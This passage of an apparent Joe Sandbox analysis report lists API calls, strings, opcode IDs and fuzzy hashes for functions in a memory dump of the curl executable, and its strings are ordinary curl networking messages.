                                • Opcode ID: e84576bcf44d3c168efdbda348a47f31b4edf5f6e23e3d50dbb8d63870899388
                                • Instruction ID: 8f5302314ba354ff52c6f06e829d3ebd9b5fa19454c9283ab90b2a6c32aac639
                                • Opcode Fuzzy Hash: e84576bcf44d3c168efdbda348a47f31b4edf5f6e23e3d50dbb8d63870899388
                                • Instruction Fuzzy Hash: 12A19570A002198BDB39EF29CC806AAB7F9FF58314F1445BEE659D6252E7709E81CF44
                                APIs
                                • _strdup.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 00863737
                                • _close.API-MS-WIN-CRT-STDIO-L1-1-0(?), ref: 00863742
                                Strings
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID: _close_strdup
                                • String ID: %s\%c%s$%s\%s$._
                                • API String ID: 2375632809-4149339551
                                • Opcode ID: c9a3070457ea81a15f0a575b6bcd31ef635ab72297d74a0048e0b128b753cd5e
                                • Instruction ID: 51cc44e3744ceb4336acd3a4e402372c786ea8f47eb6a9972afd922079530107
                                • Opcode Fuzzy Hash: c9a3070457ea81a15f0a575b6bcd31ef635ab72297d74a0048e0b128b753cd5e
                                • Instruction Fuzzy Hash: E71159E79082096EA7056BAC9C429BEB7B8FF85720F14807DF954E7341FA60DA4146A2
                                APIs
                                • setsockopt.WS2_32(?,0000FFFF,00000008,?,00000004), ref: 0087DCE2
                                • WSAIoctl.WS2_32(?,98000004,00000001,0000000C,00000000,00000000,?,00000000,00000000), ref: 0087DD3E
                                • WSAGetLastError.WS2_32(?,98000004,00000001,0000000C,00000000,00000000,?,00000000,00000000,?,0000FFFF,00000008,?,00000004), ref: 0087DD48
                                Strings
                                • Failed to set SIO_KEEPALIVE_VALS on fd %d: %d, xrefs: 0087DD50
                                • Failed to set SO_KEEPALIVE on fd %d, xrefs: 0087DCED
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID: ErrorIoctlLastsetsockopt
                                • String ID: Failed to set SIO_KEEPALIVE_VALS on fd %d: %d$Failed to set SO_KEEPALIVE on fd %d
                                • API String ID: 1819429192-3022933585
                                • Opcode ID: 7f0fe98cce222c00012f4f4125e086fec4b3b9ceca7a656efb2e23437d7ee60a
                                • Instruction ID: 7f29869a8f89b7769d668563c98119f8f57645465c767dc48ed57d592c52eb22
                                • Opcode Fuzzy Hash: 7f0fe98cce222c00012f4f4125e086fec4b3b9ceca7a656efb2e23437d7ee60a
                                • Instruction Fuzzy Hash: CA116DB2A01605ABE714DF648C46EBF7BBDFB45710F00422EB519E6180EA749A058BA1
                                APIs
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00876F9B
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00876FB9
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 008770AA
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00877229
                                Strings
                                • Connection #%ld to host %s left intact, xrefs: 00877182
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID: free
                                • String ID: Connection #%ld to host %s left intact
                                • API String ID: 1294909896-3505918467
                                • Opcode ID: fcf0fffce4705b9d4fa7c89eb855205cabfa9f5583487f596050e8b971ec91d1
                                • Instruction ID: 8d6b5c75cf06ec52cdb15fd383585c227a81ff431c30faf00154090a5580ee56
                                • Opcode Fuzzy Hash: fcf0fffce4705b9d4fa7c89eb855205cabfa9f5583487f596050e8b971ec91d1
                                • Instruction Fuzzy Hash: 8B81F930B04615DBDB29DF24C8857E9B7A1FF44710F088169E85CDB29ADB70AC81CBA1
                                APIs
                                • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F5,00869002), ref: 008631FC
                                • GetConsoleMode.KERNELBASE(00000000,008CF568), ref: 00863212
                                • SetConsoleCtrlHandler.API-MS-WIN-CORE-CONSOLE-L1-1-0(Function_000031E0,00000001,?), ref: 00863239
                                • SetConsoleMode.KERNELBASE(00000003), ref: 00863252
                                • SetConsoleCtrlHandler.API-MS-WIN-CORE-CONSOLE-L1-1-0(Function_000031E0,00000000), ref: 0086326C
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID: Console$CtrlHandlerMode$Handle
                                • String ID:
                                • API String ID: 575565773-0
                                • Opcode ID: 5e64efe8ec7e8ca30eb7e3a7e12b73bdcd5e17b5c6210fd485d2bd0df3148ba9
                                • Instruction ID: 1fc17ecb549a94df83c0a72703fd0d619848ec193021aab0e527537bbd90c358
                                • Opcode Fuzzy Hash: 5e64efe8ec7e8ca30eb7e3a7e12b73bdcd5e17b5c6210fd485d2bd0df3148ba9
                                • Instruction Fuzzy Hash: D80119306047116BEB119F78AC19F6937BAFF05727B160234FB61D62E1EA71CA428660
                                APIs
                                • strtol.API-MS-WIN-CRT-CONVERT-L1-1-0(00000000,?,0000000A,?,?,?,?), ref: 00861E56
                                • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F4,?,?,?), ref: 00861E9D
                                • GetConsoleScreenBufferInfo.KERNELBASE(00000000,?,?,?,?), ref: 00861EAD
                                Strings
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID: BufferConsoleHandleInfoScreenstrtol
                                • String ID: COLUMNS
                                • API String ID: 283564500-2475376301
                                • Opcode ID: abf6e07c4d268f074403457505eee6357a546293e8675f4f13a45d91bbca8f5f
                                • Instruction ID: 5fa1049ebb5f3fce01e89e0d87285c1b27f563b8f1858f755b7983a8c2ef9128
                                • Opcode Fuzzy Hash: abf6e07c4d268f074403457505eee6357a546293e8675f4f13a45d91bbca8f5f
                                • Instruction Fuzzy Hash: 5531C2709006048FDB24DF69D888BBAB7F4FF04314F69062ED846DA292E736ED85CB50
                                APIs
                                  • Part of subcall function 00870B38: GetModuleHandleA.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(ntdll,RtlVerifyVersionInfo), ref: 00870B6D
                                  • Part of subcall function 00870B38: GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(00000000), ref: 00870B74
                                  • Part of subcall function 0087D33A: GetModuleHandleA.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(kernel32,?,?,?,?,00894EA1,?,?,0087D2C2), ref: 0087D34B
                                  • Part of subcall function 0087D33A: GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(00000000,LoadLibraryExA,?,?,?,?,?,00894EA1,?,?,0087D2C2), ref: 0087D363
                                  • Part of subcall function 0087D33A: _mbspbrk.API-MS-WIN-CRT-MULTIBYTE-L1-1-0(security.dll,008B7348,?,?,?,?,?,00894EA1,?,?,0087D2C2), ref: 0087D374
                                  • Part of subcall function 0087D33A: LoadLibraryExA.KERNELBASE(?,?,?,00894EA1,?,?,0087D2C2), ref: 0087D3B6
                                • GetProcAddress.KERNELBASE(00000000,InitSecurityInterfaceA,?,?,0087D2C2), ref: 00894EB0
                                Strings
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID: AddressProc$HandleModule$LibraryLoad_mbspbrk
                                • String ID: InitSecurityInterfaceA$secur32.dll$security.dll
                                • API String ID: 2293913591-3788156360
                                • Opcode ID: 0b80fbbe479723f9a0e46d8d663f8c015539f17f5a240db5e74899d6895532b2
                                • Instruction ID: 05b8773209675048da080967e5d3b300460f03de32403456602cf96fce8f0d6b
                                • Opcode Fuzzy Hash: 0b80fbbe479723f9a0e46d8d663f8c015539f17f5a240db5e74899d6895532b2
                                • Instruction Fuzzy Hash: 09F0E2B1604B125BEF253B387C1AF6E2766FB80324F088539F700D6285EB78CC0A8A40
                                APIs
                                • calloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,00872254,?,?,?,00868B8E), ref: 00881CFE
                                • calloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,00872254,?,?,?,00868B8E), ref: 00881D28
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00868B8E), ref: 00881D45
                                  • Part of subcall function 00881AEE: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000001,00000000,754C1980,?,00881D52,?,?,?,?,00868B8E), ref: 00881AF5
                                  • Part of subcall function 00881AEE: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00881D52,?,?,?,?,00868B8E), ref: 00881B03
                                  • Part of subcall function 00881AEE: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,00881D52,?,?,?,?,00868B8E), ref: 00881B11
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,00868B8E), ref: 00881DAC
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00868B8E), ref: 00881DCC
                                  • Part of subcall function 00887F41: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00888006
                                  • Part of subcall function 00887F41: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00888023
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID: free$__acrt_iob_func$calloc
                                • String ID:
                                • API String ID: 3275786289-0
                                • Opcode ID: 8880d68ed4d0d1de72c644997f577f99682c30e73a0c4f4ac3c98109f1b95392
                                • Instruction ID: 6f2b89765e12af5a474b446dca999d86669041bdc9d137ab751ed60ef70b45da
                                • Opcode Fuzzy Hash: 8880d68ed4d0d1de72c644997f577f99682c30e73a0c4f4ac3c98109f1b95392
                                • Instruction Fuzzy Hash: B92191317446169FDB08AF24E80976DBFF5FF85760F24822AE51AD7392DFB028018B90
                                APIs
                                  • Part of subcall function 008632D3: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000008), ref: 008632F6
                                • calloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 0086CF70
                                Strings
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID: callocmalloc
                                • String ID: hnd = curl_easy_init();$out of memory$Q
                                • API String ID: 1635859522-3006749264
                                • Opcode ID: 7c7a3b10b8289ba08a73987ff58d8e7076345d04ebdc11fdb511e0d04392561e
                                • Instruction ID: 87b9ae0d08bd47778a215161c63da8748b53845d46fd31c93e8517fed190f1d9
                                • Opcode Fuzzy Hash: 7c7a3b10b8289ba08a73987ff58d8e7076345d04ebdc11fdb511e0d04392561e
                                • Instruction Fuzzy Hash: A0214771F0071067CB246B78A846B6E7B95FF54360F154029F94EE7386DEB0DD0486D2
                                APIs
                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0087F255
                                  • Part of subcall function 0087941D: __alldvrm.LIBCMT ref: 00879466
                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0087F287
                                Strings
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$__alldvrm
                                • String ID: Connection time-out
                                • API String ID: 67483490-165637984
                                • Opcode ID: 530b75c69d4fd9b5b71b23235212f3a188f45f56ecc056b192f5dcd1a2f6726b
                                • Instruction ID: ff844f309094f9086fbdcb274f9f5a12925b1ec09bcf3ecafa95839b5c951f52
                                • Opcode Fuzzy Hash: 530b75c69d4fd9b5b71b23235212f3a188f45f56ecc056b192f5dcd1a2f6726b
                                • Instruction Fuzzy Hash: 4D519471B04605AFE718DF6A9845AAEB7B5FF84710F10C139E51DDB386D770E9418B80
                                APIs
                                  • Part of subcall function 0087D482: malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 0087D52F
                                • send.WS2_32(?,?,?,00000000), ref: 0087D80F
                                • WSAGetLastError.WS2_32 ref: 0087D81F
                                Strings
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID: ErrorLastmallocsend
                                • String ID: Send failure: %s
                                • API String ID: 1822245873-857917747
                                • Opcode ID: 94ec9b16885dd6361928ec5a8d88a182ee1f9dec8d16a60e38462faf97a2ebc7
                                • Instruction ID: 306cc56b293d5c64cb4851cc53823fa7801c41531db8879511743d24e7f1aec8
                                • Opcode Fuzzy Hash: 94ec9b16885dd6361928ec5a8d88a182ee1f9dec8d16a60e38462faf97a2ebc7
                                • Instruction Fuzzy Hash: 991193716003089BD711AF68DC41BDEB7B9FF88324F108A69E929D72C1D7B1D985CB91
                                APIs
                                • setsockopt.WS2_32(?,00000006,00000001,?,00000004), ref: 0087ED8A
                                • WSAGetLastError.WS2_32 ref: 0087ED95
                                  • Part of subcall function 0087A0B8: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 0087A0C3
                                  • Part of subcall function 0087A0B8: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0087A0CB
                                  • Part of subcall function 0087A0B8: __sys_nerr.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0087A0DD
                                  • Part of subcall function 0087A0B8: __sys_errlist.API-MS-WIN-CRT-RUNTIME-L1-1-0(000000FF), ref: 0087A0EC
                                  • Part of subcall function 0087A0B8: strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000), ref: 0087A0F6
                                  • Part of subcall function 0087A0B8: _strrchr.LIBCMT ref: 0087A142
                                  • Part of subcall function 0087A0B8: _strrchr.LIBCMT ref: 0087A15C
                                  • Part of subcall function 0087A0B8: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0087A173
                                  • Part of subcall function 0087A0B8: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0087A180
                                  • Part of subcall function 0087A0B8: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 0087A188
                                  • Part of subcall function 0087A0B8: SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000), ref: 0087A193
                                Strings
                                • Could not set TCP_NODELAY: %s, xrefs: 0087EDAA
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID: ErrorLast$_errno$_strrchr$__sys_errlist__sys_nerrsetsockoptstrncpy
                                • String ID: Could not set TCP_NODELAY: %s
                                • API String ID: 2763351927-4027281243
                                • Opcode ID: 14179f871cb01f59f15605822c6e9ee3490324cfdde85e920d76856b5e501f7c
                                • Instruction ID: 28fcc3c81bb9f76ad803e249021b953d59ca2ae4f990841509ba4fdb142f18b7
                                • Opcode Fuzzy Hash: 14179f871cb01f59f15605822c6e9ee3490324cfdde85e920d76856b5e501f7c
                                • Instruction Fuzzy Hash: A4F0F670A006046ADB24BB24DC16EEE77B9FF14300F00426DE449D6280EAB4DA444E81
                                APIs
                                • SleepEx.KERNELBASE(00000000,00000000), ref: 0087E28C
                                • getsockopt.WS2_32(?,0000FFFF,00001007,?,00000004), ref: 0087E2A5
                                • WSAGetLastError.WS2_32(?,0000FFFF,00001007,?,00000004), ref: 0087E2AF
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID: ErrorLastSleepgetsockopt
                                • String ID:
                                • API String ID: 3033474312-0
                                • Opcode ID: 5de96ac31d62f6d4a8ace242d8da89a11526c8bf4e0dbe22c90b16681f29a5bc
                                • Instruction ID: cf64b96e50d1a1485568e4947eee0cbdca0168ab35320215ec2edc19a0857de2
                                • Opcode Fuzzy Hash: 5de96ac31d62f6d4a8ace242d8da89a11526c8bf4e0dbe22c90b16681f29a5bc
                                • Instruction Fuzzy Hash: 97F09671610609BFD7109F95CC44EAE7BBCFB49318F104169F509D3290E770DD059660
                                APIs
                                  • Part of subcall function 0088F90F: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0088F962
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 008786E0
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00878712
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 0087875C
                                  • Part of subcall function 0087941D: __alldvrm.LIBCMT ref: 00879466
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID: free$Unothrow_t@std@@@__alldvrm__ehfuncinfo$??2@
                                • String ID:
                                • API String ID: 256925405-0
                                • Opcode ID: 9b97898dc031ef9c1db8a88b68af2a19d36a152bd1d647588a99fc323a4af59a
                                • Instruction ID: 9b761f4942a7bb7f6be3876f9ae7fbb2e26f4a4095372128b395feefd1ec93c3
                                • Opcode Fuzzy Hash: 9b97898dc031ef9c1db8a88b68af2a19d36a152bd1d647588a99fc323a4af59a
                                • Instruction Fuzzy Hash: 68D19831E44614DBDF14DF5888897ADBBB2FF85310F28816AD849EF28ADE719C418B91
                                Strings
                                • operation aborted by pre-request callback, xrefs: 008780B5
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID: free
                                • String ID: operation aborted by pre-request callback
                                • API String ID: 1294909896-1824986975
                                • Opcode ID: 43777340b9849d99626aabd347dfe69dcd5a5da3f29716c79571c0e39f06dfeb
                                • Instruction ID: fe43e8a9aa9db2a1c0e61ed17f28c543b9b8cd40f69ae248ad27266bd365cce4
                                • Opcode Fuzzy Hash: 43777340b9849d99626aabd347dfe69dcd5a5da3f29716c79571c0e39f06dfeb
                                • Instruction Fuzzy Hash: 4A91B331A44204DBDF149F68D8897ADBBA1FF84324F28817AD809EB2DADE70CC45CB51
                                Strings
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID:
                                • String ID: no transfer performed
                                • API String ID: 0-1612002148
                                • Opcode ID: 8d9a072ae1e28e73ef23452f35bcd2e7cc611eb4e030fdf57ff5bc8ea71a521d
                                • Instruction ID: 81da56a887ba735bd1b5fdea3605400de4c9f6e1480e7d91577daa10d60b50b1
                                • Opcode Fuzzy Hash: 8d9a072ae1e28e73ef23452f35bcd2e7cc611eb4e030fdf57ff5bc8ea71a521d
                                • Instruction Fuzzy Hash: 8031E3B2D0061A6BCB26DAB89496BBD77B4FB44734F1702A9D885E7389DA31DD048780
                                APIs
                                • socket.WS2_32(?,?,?), ref: 0087F530
                                • ioctlsocket.WS2_32(?,8004667E,?), ref: 0087F566
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID: ioctlsocketsocket
                                • String ID:
                                • API String ID: 416004797-0
                                • Opcode ID: b410962e8271fa6089fcd8c1aad4006bf85905ebe813e0f39b4091e2844ecbd8
                                • Instruction ID: db2ca6201a3d24fe6236e10e703f85a13b883a5a8e05d62c598bcce18aeec661
                                • Opcode Fuzzy Hash: b410962e8271fa6089fcd8c1aad4006bf85905ebe813e0f39b4091e2844ecbd8
                                • Instruction Fuzzy Hash: 57315771A00615DFDB24DF29D884BAABBE2FF08314F1085A9E55ED7252D731E884CF40
                                APIs
                                • malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 0087D52F
                                • recv.WS2_32(?,?,?,00000000), ref: 0087D56C
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID: mallocrecv
                                • String ID:
                                • API String ID: 410377367-0
